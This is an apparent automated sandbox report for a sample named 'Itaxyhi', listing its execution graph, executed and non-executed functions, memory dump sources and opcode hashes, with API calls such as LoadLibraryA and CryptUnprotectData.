                                                                                  execution_graph 16007 7ffd34891d9a 16008 7ffd3489b7b0 LoadLibraryA 16007->16008 16010 7ffd3489b904 16008->16010 16004 7ffd3489d25c 16005 7ffd3489b6f0 LoadLibraryA 16004->16005 16006 7ffd3489d261 16005->16006 15999 7ffd3489bf3d 16000 7ffd3489bf5f 15999->16000 16001 7ffd3489c041 16000->16001 16002 7ffd3489c28c CryptUnprotectData 16000->16002 16003 7ffd3489c2d9 16002->16003 15991 7ffd3489cb9f 15994 7ffd3489b6f0 15991->15994 15993 7ffd3489cba4 15995 7ffd3489b709 15994->15995 15996 7ffd3489b70e 15995->15996 15997 7ffd3489b8b0 LoadLibraryA 15995->15997 15996->15993 15998 7ffd3489b904 15997->15998 15998->15993

                                                                                  Executed Functions

                                                                                  Function 00007FFD348AC4DB Relevance: 2.6, Strings: 1, Instructions: 1304COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2154568238.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34890000_Itaxyhi.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: _M_H
                                                                                  • API String ID: 0-2404144706
                                                                                  • Opcode ID: 7bac4b70063e00028ca4f950c967357f477bdb9b1e6edcfadbbf40b614e6da0c
                                                                                  • Instruction ID: a774fe1c8a3cf9f1a3fbf2331862e13feafed81d214d019c76a046817f1e80d2
                                                                                  • Opcode Fuzzy Hash: 7bac4b70063e00028ca4f950c967357f477bdb9b1e6edcfadbbf40b614e6da0c
                                                                                  • Instruction Fuzzy Hash: 6E926F30609A4A8FDBD4EF2CC4A4BA937E1FF5A310F1405B9E44EC7292CA79E855DB50
                                                                                  Function 00007FFD3489BF3D Relevance: 1.9, APIs: 1, Instructions: 382COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2154568238.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34890000_Itaxyhi.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e5489f03eef8d7b5e21042ccd91c3472e4653775761e24d134a4e51fd3dbe3e6
                                                                                  • Instruction ID: 85ecfb4c498336dd1b020ac30ec85e8f7a3e1226ea8444fcd6c674cf0f79ce1c
                                                                                  • Opcode Fuzzy Hash: e5489f03eef8d7b5e21042ccd91c3472e4653775761e24d134a4e51fd3dbe3e6
                                                                                  • Instruction Fuzzy Hash: 76C10B30A0CB494FD769DF68C8A56A5BBE1FF56310F0446BED04DD3292DE39A885CB81
                                                                                  Function 00007FFD34896C78 Relevance: 1.1, Instructions: 1103COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2154568238.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34890000_Itaxyhi.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2288d5483df0878b2a0990571a5283a1037de60e943bdf6270868658d7663160
                                                                                  • Instruction ID: 9d86b368570f601decfaed67c1acacff589ef2e2a9de36faf3e48f82c8df65ad
                                                                                  • Opcode Fuzzy Hash: 2288d5483df0878b2a0990571a5283a1037de60e943bdf6270868658d7663160
                                                                                  • Instruction Fuzzy Hash: 49823B30B1890A8BEB98EB58C4A1779B792FF95305F644079D51EC75C2DF3AEC82D680
                                                                                  Function 00007FFD348A82D6 Relevance: .5, Instructions: 474COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2154568238.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34890000_Itaxyhi.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 89e3a187705cc966c0c5ffd214f0f3780f404d82596380c43c1ee5cda7d6a49a
                                                                                  • Instruction ID: ce1b2f4b7a981563cd2710f19edf92f803706ca0b1990eb4a9bb98b12ca956ad
                                                                                  • Opcode Fuzzy Hash: 89e3a187705cc966c0c5ffd214f0f3780f404d82596380c43c1ee5cda7d6a49a
                                                                                  • Instruction Fuzzy Hash: 2BF1A630A09A8D4FEBA8DF28C8957E937E1FF55310F04466EE84DC7291DF78A8458B91
                                                                                  Function 00007FFD348A9082 Relevance: .5, Instructions: 460COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2154568238.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34890000_Itaxyhi.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 26aa48440910cae287aeb8ff9220f338836a8a15571fda37c23c1b17d3618dcb
                                                                                  • Instruction ID: ef0804c05af484db5849a3f19c87693d61c5bca296c8cefd9635faed43b484a6
                                                                                  • Opcode Fuzzy Hash: 26aa48440910cae287aeb8ff9220f338836a8a15571fda37c23c1b17d3618dcb
                                                                                  • Instruction Fuzzy Hash: 1EE1A430A0DA4E4FEBA8DF28C8A57E977E1FF55310F04466AD84DC7291DE78E9418B81
                                                                                  Function 00007FFD34891D9A Relevance: 1.7, APIs: 1, Instructions: 194libraryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 957 7ffd34891d9a-7ffd3489b82c 963 7ffd3489b82e-7ffd3489b855 957->963 964 7ffd3489b89f-7ffd3489b902 LoadLibraryA 957->964 963->964 967 7ffd3489b857-7ffd3489b85a 963->967 968 7ffd3489b90a-7ffd3489b946 call 7ffd3489b962 964->968 969 7ffd3489b904 964->969 970 7ffd3489b85c-7ffd3489b86f 967->970 971 7ffd3489b894-7ffd3489b89c 967->971 979 7ffd3489b948 968->979 980 7ffd3489b94d-7ffd3489b961 968->980 969->968 973 7ffd3489b871 970->973 974 7ffd3489b873-7ffd3489b886 970->974 971->964 973->974 974->974 976 7ffd3489b888-7ffd3489b890 974->976 976->971 979->980
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2154568238.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34890000_Itaxyhi.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: aa2592277604635382d305dfffe3cd252b28f20aa79419453012d16a1e9718cb
                                                                                  • Instruction ID: 9e5e872e9975e737d20fb3caa28186d997021bd8f3b78f6c3f4d9761257f8e34
                                                                                  • Opcode Fuzzy Hash: aa2592277604635382d305dfffe3cd252b28f20aa79419453012d16a1e9718cb
                                                                                  • Instruction Fuzzy Hash: A0518230608A4D8FDB98EF58C8967F57BD1FB59311F10422EE84ED3291DB75E8418B81

                                                                                  Non-executed Functions

                                                                                  Function 00007FFD34893250 Relevance: 2.4, Instructions: 2379COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2154568238.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34890000_Itaxyhi.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 39839bc6a81b6e22402fed3a9c7fef24f43f6703be1310ae7ef074fa5e266991
                                                                                  • Instruction ID: 2915b81c5da45b318c338137ade07ba54c1e34ca3f64552325ff061b48da8952
                                                                                  • Opcode Fuzzy Hash: 39839bc6a81b6e22402fed3a9c7fef24f43f6703be1310ae7ef074fa5e266991
                                                                                  • Instruction Fuzzy Hash: 51E23920B28D1A4FE75CF76CD8A5A7476C2EB8AB50F4005B9E64EC32D3DD197C8192C6
                                                                                  Function 00007FFD34892280 Relevance: .3, Instructions: 275COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2154568238.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34890000_Itaxyhi.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b527ca0c06c6a585e4e81f2b8d3e15e4e2e071f105f96c76aeb25c7e709c363e
                                                                                  • Instruction ID: d7e8173441e9813a3fd87aec9491f6a75ba71b0ec277f9d9e7e612113f396c45
                                                                                  • Opcode Fuzzy Hash: b527ca0c06c6a585e4e81f2b8d3e15e4e2e071f105f96c76aeb25c7e709c363e
                                                                                  • Instruction Fuzzy Hash: 4F713C61B0DF4A0BE778DB6C98A21B67BD1FF86314708057ED48EC3686DD2CB8028384
                                                                                  Function 00007FFD348993E2 Relevance: .2, Instructions: 250COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2154568238.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34890000_Itaxyhi.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: db8888e753c8378e921f4df98d14a8ca3776fe38e2df5d21c5a42ea6d79c65af
                                                                                  • Instruction ID: e0dfafd910886eb79dd54577b5d15763326340341380bfa20b4425912a9d3cd7
                                                                                  • Opcode Fuzzy Hash: db8888e753c8378e921f4df98d14a8ca3776fe38e2df5d21c5a42ea6d79c65af
                                                                                  • Instruction Fuzzy Hash: 4471D767B0DA921BE352A7AC6CB60DA7F94EF5337970900B7C298CB193ED1C34075692
                                                                                  Function 00007FFD34892FF2 Relevance: .2, Instructions: 236COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2154568238.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34890000_Itaxyhi.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5fba8f53df7d25f47ae1d7973cadec7b5266b783479022db695bb64cb902849f
                                                                                  • Instruction ID: 91485063f5ce26a5a6af6998c94d4522292aa2e4aea4c3e719e1547e77940b0c
                                                                                  • Opcode Fuzzy Hash: 5fba8f53df7d25f47ae1d7973cadec7b5266b783479022db695bb64cb902849f
                                                                                  • Instruction Fuzzy Hash: F4716617A0D6D22BD722A77C68F61DA3FA4DE8337570D41F7D188CF093E91C644A9292
                                                                                  Function 00007FFD34899438 Relevance: .2, Instructions: 204COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2154568238.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34890000_Itaxyhi.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 462b105f366e6832f06827270aba95fcff0877c214c04ce996d9180b3d1319ce
                                                                                  • Instruction ID: 8aa271d071975c82d7985c28a4522f40957eac1b44443f654812b55ee1228a3e
                                                                                  • Opcode Fuzzy Hash: 462b105f366e6832f06827270aba95fcff0877c214c04ce996d9180b3d1319ce
                                                                                  • Instruction Fuzzy Hash: 5051E467B0DA921BE362976C5CF60DABF94EF1336870900B6C798CB193ED1D340B5692
                                                                                  Function 00007FFD348A0EC8 Relevance: .2, Instructions: 178COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2154568238.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34890000_Itaxyhi.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 801f30008f8fe8f9e46c489ba483b48c5a338730fad761bcbe39225c07008ac8
                                                                                  • Instruction ID: c3b3f005eed55d7e35cb4e3c15b9859e1681e3c6d5538799932f94b1cb8c2f8f
                                                                                  • Opcode Fuzzy Hash: 801f30008f8fe8f9e46c489ba483b48c5a338730fad761bcbe39225c07008ac8
                                                                                  • Instruction Fuzzy Hash: C5512C53F0FAD35BF6925B681CF60996B90EF23354B0880B6C568D70C3DD4DB40AA1A5